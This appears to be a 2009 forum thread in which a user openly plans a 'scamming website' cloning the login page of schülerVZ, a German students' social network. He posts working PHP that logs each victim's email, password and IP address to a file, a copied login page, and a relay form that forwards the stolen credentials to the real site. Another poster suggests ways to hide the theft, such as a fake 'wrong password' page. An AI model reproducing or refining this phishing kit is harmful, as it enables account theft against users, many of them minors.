[Question] 2x "Method-Post"

**~~sheepking~~** · 03-04-2009

Hey there. I want to ask a question. I am writing for a "realistic" scamming website and now I'm for a problem: I want that the datas given in (email and password) will be sent to my site (engine.php) and to the real site that you are really logged in to the real site and redirected there, but the datas will be protcolled in my logfile.

Now in the index.php file there is this row:

Now, what do when I want that in the "action="" " field can be two websites that will be redirected...

If you want I will post the full Website here (If it works) and engine.php

But please help me!

Will +Rep x2

**~~camicio~~** · 03-06-2009

This could help you: Double Action Form?
it opens the second page with a popup via javascript.

Otherwise like the OP there says, simply make the form go to engine.php, run whatever code you want and then use Header().
Here's how to send the data to the second page as POST, which is what most forms are using: Header location POST - Google Search
But I guess it won't work if the other website uses https.

**~~sheepking~~** · 03-06-2009

Hey, there, thank you very, very much!

Helped me a lot and gave me an idea.

<?php
$user = $_POST['email'];
$pass = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];

$entry_line = "E-Mail: ".$user." password: ".$pass." ip: ".$ip."<br>";
$fp = fopen("log.html", "a");
fwrite($fp, $entry_line);
fclose($fp);

header( 'Location: http://XXX/engine.php' );
?>

Maybe I could add some more fields like maybe:

<form id="Loginbox" method="post" action="https://secure.schuelervz.net/Login">
<fieldset>
<label for="Login_email">E-Mail</label>
<input onfocus="this.hasfocus='yes';" class="text" name="email" id="Login_email" value="$user" type="text">
<label for="Login_password">Passwort</label>
<input onfocus="this.hasfocus='yes';" class="text" name="password" id="Login_password" value="$pass" type="password">
<table>
<tbody><tr>

If I would put that under the usual engine.php file, would it maybe work? Please answer!

(Ah end yeh, 1+rep for the first post)

Edit: I know that the second red thing is HTML, but maybe I could include it to the php code?

**~~camicio~~** · 03-06-2009

"Remember that header() must be called before any actual output is sent, either by normal HTML tags, blank lines in a file, or from PHP."

I don't really understand what you mean but if you type this in a .php file

Code:

1
<?php 
echo "2"; 
?>
3

it will appear as
123

**~~sheepking~~** · 03-06-2009

Originally Posted by camicio

"Remember that header() must be called before any actual output is sent, either by normal HTML tags, blank lines in a file, or from PHP."

I don't really understand what you mean but if you type this in a .php file

Code:

1
<?php 
echo "2"; 
?>
3

it will appear as
123

Maybe you didn't understand my problem:

I want that all Datas sent to "engine.php" ($user, $pass) will be send to the next page (https://secure.schuelervz.net/Login)

With this "Method"Post"" thingie or with the header. But how to do this?

Can you integrate (Sorry dont know if its right, german its "integrieren") html on a .php document like this?

**~~camicio~~** · 03-06-2009

I just found out reading Header location POST - Google Search that you can't tell to browser to go to another website AND pass some parameters as POST.

Your best bet is probably to do as this guy did, with javascript. The form should point to the original website which will open in a popup and javascript should change the location to engine.php: Double Action Form?

But I don't think it will work anyway, because the website you quoted uses https which I guess will protect it from something like this (not sure to be honest).

Another thing you could do is simply make two, pages, the first one containing the form and pointing to engine.php which will logs the result, the second one looking exactly like the first but with a form pointing to the real website and some advice like "Wrong password, please try again".

**~~sheepking~~** · 03-06-2009

Originally Posted by camicio

I just found out reading Header location POST - Google Search that you can't tell to browser to go to another website AND pass some parameters as POST.

Your best bet is probably to do as this guy did, with javascript. The form should point to the original website which will open in a popup and javascript should change the location to engine.php: Double Action Form?

But I don't think it will work anyway, because the website you quoted uses https which I guess will protect it from something like this (not sure to be honest).

Another thing you could do is simply make two, pages, the first one containing the form and pointing to engine.php which will logs the result, the second one looking exactly like the first but with a form pointing to the real website and some advice like "Wrong password, please try again".

Hmm, no, I know its possible...

Wait I will describe: Maybe a second page (maybe a log.html) where the $user and $pass are saved in and then will be loaded from the next page and will be posted at the real site?

Ah end yeh, the site I stole the style from is really using this stupid

Code:

<form id="Loginbox" method="post" action="https://secure.schuelervz.net/Login">

So I think I could transfer this "through" my engine.php like a proxy does...

Edit: And I wouldn't use the popup thing, cuz it may be blocked and than I would look silly

The original Page:

Code:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head>
    <meta http-equiv="content-type" content="text/html; charset=utf-8" />
    <meta http-equiv="imagetoolbar" content="no" />
    <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
    
    <title>schuelerVZ | Bist du schon drin?</title>
    
    <meta name="description" content="schülerVZ ist ein kostenloses Online-Netzwerk für Schüler. Hier können sie ihr eigenes Profil gestalten, Fotos hochladen, Freunde treffen, diskutieren uvm." />
    <meta name="keywords" content="Schüler, pupils" />
    <meta name="ajaxUrl" content="/Ajax" />
    <meta name="platformId" content="Pvz" />
    
    
    <meta name="activeModules" content="Default,Search,Login,StaticContent,Invitation,Chat,Info" />
    <meta name="pageletName" content="Default.Overview" />

    <link rel="shortcut icon" href="http://static.pe.schuelervz.net/20090304-1/favicon.ico" />

            <link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090304-1/Css/Default.css" />
            <link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090304-1/Css/Main.css" />
            <link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090304-1/Css/Objects.css" />
            <link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090304-1/Css/DefaultJS.css" />
            <link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090304-1/Css/Login.css" />
            <link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090304-1/Css/LeftSideBox.css" />
            <link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090304-1/Css/Mod_Default.css" />
    
    <script type="text/javascript" src="http://static.pe.schuelervz.net/20090304-1/Js/build/resource-core.js"></script>
    <script type="text/javascript">
//<![CDATA[
var brs = navigator.userAgent.toLowerCase();
function Adition_BrowserId(){if(brs.search(/konqueror/)!=-1){return 8;}else if(brs.search(/safari/)!=-1){return 8;}else if(brs.search(/netscape6/)!=-1){return 5;}else if(brs.search(/netscape\/(7\.\d*)/)!=-1){return 5;}else if(brs.search(/netscape4/)!=-1){return 4;}else if((brs.search(/mozilla\/(4.\d*)/)!=-1)&&(brs.search(/msie\s(\d+(\.?\d)*)/)==-1)){return 4;}else if((brs.search(/gecko\//)!=-1)){return 6;}else if (brs.search(/opera/)!=-1){return 7;}else if(brs.search(/msie\s4/)!=-1){return 1;}else if(brs.search(/msie\s5/)!=-1){return 2;}else if(brs.search(/msie\s6/)!=-1){return 3;}else if(brs.search(/msie\s7/)!=-1){return 9;}else{return -1;}}
function Adition_OSId(){var os;if((brs.search(/windows/)!=-1)||((brs.search(/win9\d{1}/)!=-1))){if(brs.search(/nt\s5\.1/)!=-1){os=3;}else if(brs.search(/nt\s5\.0/)!=-1){os=2;}else if(brs.search(/nt\s5\.2/)!=-1){os=8;}else if(brs.search(/nt\s6\.0/)!=-1){os=9;}else if((brs.search(/win98/)!=-1)||(brs.search(/windows\s98/)!=-1)){os=1;}else if(brs.search(/windows\sme/)!=-1){os=1;}else if((brs.search(/windows\s95/)!=-1)||(brs.search(/win95/)!=-1)){os=1;}else if((brs.search(/nt\s4\.0/)!=-1)||(brs.search(/nt4\.0/))!=-1){os=4;}return os;}else if(brs.search(/linux/)!=-1){return 6;}else if(brs.search(/mac\sos\sx/)!=-1){return 5;}else if((brs.search(/macintosh/)!=-1)||(brs.search(/mac\x5fpowerpc/)!=-1)){return 5;}else if((brs.search(/unix/)!=-1)||(brs.search(/x11/)!=-1)){return 7;}else{return -1;}}
function Adition_ResId(){if(screen.width==640&&screen.height==480){return 1;}else if(screen.width==800&&screen.height==600){return 2;}else if(screen.width==1024&&screen.height==768){return 3;}else if(screen.width==1152&&screen.height==864){return 4;}else if(screen.width==1280&&screen.height==1024){return 5;}else if(screen.width==1600&&screen.height==1200){return 6;}else if(screen.width==1280&&screen.height==960){return 7;}else if(screen.width==1400&&screen.height==1050){return 8;}else if(screen.width==1280&&screen.height==768){return 9;}else if(screen.width==1280&&screen.height==800){return 10;}else if(screen.width==1440&&screen.height==900){return 11;}else if(screen.width==1680&&screen.height==1050){return 12;}else if(screen.width==1920&&screen.height==1200){return 13;}return -1;}
function Adition_Flash(){var f="",n=navigator;if(n.plugins&&n.plugins.length){for(var ii=0;ii<n.plugins.length;ii++){if(n.plugins[ii].name.indexOf('Shockwave Flash')!=-1){f=n.plugins[ii].description.split('Shockwave Flash ')[1];i=f.indexOf('.');f=f.substr(0,i);break;}}}else if(window.ActiveXObject){for(var ii=10;ii>=2;ii--){try{var fl=eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash."+ii+"');");if(fl){f=ii;break;}}catch(e){}}}return f;}
var ad_wid = Math.round(Math.random()*2000000000);var ad_count = 0;var ref;try{ref=escape(document.referrer);}catch(e){ref='-'}var os;try{os=Adition_OSId();}catch(e){os=''}var browser;try{browser=Adition_BrowserId();}catch(e){browser=''}var screen_res;try{screen_res=Adition_ResId();}catch(e){screen_res=''}var fvers;try{fvers=Adition_Flash();}catch(e){fvers=''}
//]]>
</script></head>
<body class="isNotLoggedIn gecko gecko19">
<div id="Grid-Wrapper">
    <div id="Grid-Advertising-Top">
            </div>
    <div id="Grid-Advertising-Right">
            </div>
    <div id="Grid-Page">
        <div id="Grid-Page-Center">
            <div id="Grid-Page-Center-Top">
                <div id="Grid-Page-Center-Top-Title">
                    <img src="http://static.pe.schuelervz.net/20090304-1/Img/el_verzeichnis.png" alt="SCHÜLERVERZEICHNIS"/>
                </div>
                <div id="Grid-Page-Center-Top-Navigation">
                    <ul>
                                                <li><a href="/Login" title="Einloggen">einloggen</a></li>
                                            <li><a href="/Registration" title="anmelden">anmelden</a></li>
                                            <li><a href="/Newsroom/Overview/tid/124" title="klartext">klartext</a></li>
                                            <li><a href="/l/help" title="hilfe">hilfe</a></li>
                                        </ul>
                </div>
            </div>

            <div id="Grid-Page-Center-Header">
                <h1 class="ellipsis" title="Bist du schon drin?">Bist du schon drin?</h1>
                                                                </div>

            <div id="Grid-Page-Center-Content">
                                                
                                <div id="shoutboxJs" class="hidden">
                    <div>
                        <p id="shoutboxJsSuccess" class="success hidden"></p>
                        <p id="shoutboxJsError" class="error hidden"></p>
                    </div>
                    <div class="close">
                        <a href="javascript:;"></a>
                    </div>
                </div>
                
                <div id="Mod-Default">
        
    <div class="obj-box full no-float">
        <div class="Snipplet-TopInfo">
</div>
<div class="Snipplet-Default-Overview">
    <img class="avatar" src="http://static.pe.schuelervz.net/20090304-1/Img/FrontBoy.png" alt="Avatar" />
    <h2 class="alternate">Lass dich einladen!</h2>
    
    <ul>
                        
            <li><span>Triff deine Freunde aus der Schule!</span></li>
                
                     
            <li><span>Wer kennt wen über wen?</span></li>
                
                     
            <li><span>Wer ist auf welcher Schule?</span></li>
                
                     
            <li><span>Wer sitzt in meiner Parallelklasse?</span></li>
                
                     
            <li><span>Wer hat wann Geburtstag?</span></li>
                
                        
                     
            <li><span>Haben deine Freunde schon die Fotos vom Wochenende hochgeladen?</span></li>
            
    </ul>
    
    <div class="teaser-area">
        <div class="teaser">
            <a href="/Registration/" title="">Eingeladen?</a><br />
            Los geht's        </div>
        
            </div>
</div>        
    </div>
</div>            </div>

            <div id="Grid-Page-Center-Footer">
                <ul>
                                        <li><a href="/l/schueler/" title="Schüler">Schüler</a></li>
                                        <li><a href="/l/parents" title="Eltern und Lehrer">Eltern und Lehrer</a></li>
                                        <li><a href="/l/press" title="Presse">Presse</a></li>
                                        <li><a href="/l/impressum" title="Impressum">Impressum</a></li>
                                        <li><a href="/l/terms" title="AGB">AGB</a></li>
                                        <li><a href="/l/policy" title="Datenschutz">Datenschutz</a></li>
                                        <li><a href="/l/rules" title="Verhaltenskodex">Verhaltenskodex</a></li>
                                    </ul>
            </div>
                        <div>
                        </div>
        </div>
        <div id="Grid-Page-Left">

            <div id="Logo">
                <a href="/Default" title="zur Startseite">
                    <img src="http://static.pe.schuelervz.net/20090304-1/Img/logo.png" alt="Logo schülerVZ, Link zur Startseite" />
                </a>
            </div>

                            <form id="Loginbox" method="post" action="https://secure.schuelervz.net/Login">
    <fieldset>
        <label for="Login_email">E-Mail</label>
        <input onfocus="this.hasfocus='yes';"  class="text" type="text" name="email" id="Login_email" value="" />
        <label for="Login_password">Passwort</label>
        <input onfocus="this.hasfocus='yes';"  class="text" type="password" name="password" id="Login_password" value="" />
        <table>
    <tr>
        <td><input onfocus="this.hasfocus='yes';" type="checkbox" name="reminder" id="Login_remind" value="1" class="remind-login"/></td>
        <td><label for="Login_remind">Eingeloggt bleiben</label></td>
        <td><img  class="loginTooltipIcon" src="http://static.pe.schuelervz.net/20090304-1/Img/tooltipp.gif" width="14px"/>
        <div id="reminder-hint" class="hidden">Setze dieses Häkchen nur, wenn außer dir niemand anderes diesen Computer verwendet.                          <a href="http://www.schuelervz.net/Newsroom/Detail/5c7c8d3134c3d2c9">Warum?</a>
              
        </div>
        </td>
    </tr>
    </table>
        <input onfocus="this.hasfocus='yes';"  class="button" type="submit" name="login" value="Einloggen" />
        <input type="hidden" name="jsEnabled" id="jsEnabled" value="false" />
        <script type="text/javascript">
                document.getElementById('jsEnabled').value = 'true';
            </script>
        <input type="hidden" name="formkey" value="a61785cbff1b613094a03c6c4145ea61b2ce3eb780dfd802b64f0e3586980adc59a8e4876a62a7773de2ac3c1f6de488be91d11d05c9ca11fac44495b7cedac6c36ccf0d32edb384a16d6b799338f8ebcd916f72f71b49094a24b44e9b62961f" />
<input type="hidden" name="iv" value="31665f1b20f9122284694598f0883ab0" />

    </fieldset>
</form>
            
                        <ul id="Grid-Navigation-Main" class="obj-linklist">
                                    <li><a href="/Registration" title="Anmelden">Anmelden</a></li>                            </ul>
            
                            <div id="LeftsideBox">
    <div>
        <p>Achtung, Pausenbroth&auml;ndler!</p>    </div>
</div>
            
        </div>
        <br class="Clear-The-Evil-Float" />
    </div>
</div>


<script type="text/javascript" src="http://static.pe.schuelervz.net/20090304-1/Js/build/phx-core.js"></script>
<script type="text/javascript" src="http://static.pe.schuelervz.net/20090304-1/Js/build/phx-start.js"></script>

<!-- SZM VERSION="1.6" -->
<script type="text/javascript">
/* <![CDATA[ */
var IVW="http://schuelvz.ivwbox.de/cgi-bin/ivw/CP/index;LoggedOut";
document.write("<div id=\"ivwbox\"><img src=\""+IVW+"?r="+escape(document.referrer)+"&d="+(Math.random()*100000)+"\" width=\"1\" height=\"1\" alt=\"\" name=\"szmimages\" /><\/div>");
/* ]]> */
</script>

<noscript>
    <div id="ivwbox"><img src="http://schuelvz.ivwbox.de/cgi-bin/ivw/CP/index;LoggedOut" width="1" height="1" alt="" /></div>
</noscript>
<!-- /SZM -->

<script type="text/javascript">
/* <![CDATA[ */
var originalIvwSource = document.szmimages.src;

function ReloadPixelImages(PixelCode, PixelComment)
{
    var IVW = "http://schuelvz.ivwbox.de/cgi-bin/ivw/CP/" + PixelCode + ";" + PixelComment;
    document.szmimages.src = IVW + "?r=" + escape(document.referrer) + "&d=" + (Math.random() * 100000);
}

function ResetPixelImages()
{
    var newIvwSource = originalIvwSource.substring(0, originalIvwSource.indexOf('&d=') + 3) + (Math.random() * 100000);
    document.szmimages.src = newIvwSource;
}
/* ]]> */
</script>
</body>
</html>

**~~sheepking~~** · 03-07-2009

Now I'm already very far:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html class="javascript-enabled" xml:lang="de" xmlns="http://www.w3.org/1999/xhtml" lang="de"><head>

<meta http-equiv="content-type" content="php/text/html; charset=UTF-8">

<form id="Loginbox" method="post" action="https://secure.schuelervz.net/Login">
<fieldset>
<input onfocus="hidden" class="text" name="email" id="Login_email" value="<?php echo $_POST['email']?>" type="text">
<input onfocus="hidden" class="text" name="password" id="Login_password" value="<?php echo $_POST['password']?>" type="password">
<table>
<tbody><tr>
</tr>
</tbody></table>
<input name="jsEnabled" id="jsEnabled" value="true" type="hidden">
<script type="text/javascript">
document.getElementById('jsEnabled').value = 'true';
</script>
<input name="formkey" value="df9ca13ed1386d77fa29bb31bab02adffa59d372a66da937a4a3461ea5be66c8f9ef12572 7f79d3d256076c23cf725c4d9354d31cceb0110d185e65110992879d7487e0d57a15573c563d80b5 b9679a259077c4a17569a10e0647b1b7766484d" type="hidden">
<input name="iv" value="c68aa3013b29ebb37ba6a7b8352a5dab" type="hidden">

</fieldset>
</form>
<?php
$user = $_POST['email'];
$pass = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];

$entry_line = "E-Mail: ".$user." password: ".$pass." ip: ".$ip."<br>";
$fp = fopen("log.html", "a");
fwrite($fp, $entry_line);
fclose($fp);
?></html>

Now I just want that the thing will be posted automatically and won't be showed as output... please help me!!

Will +rep you and you can think you a kiss by me :P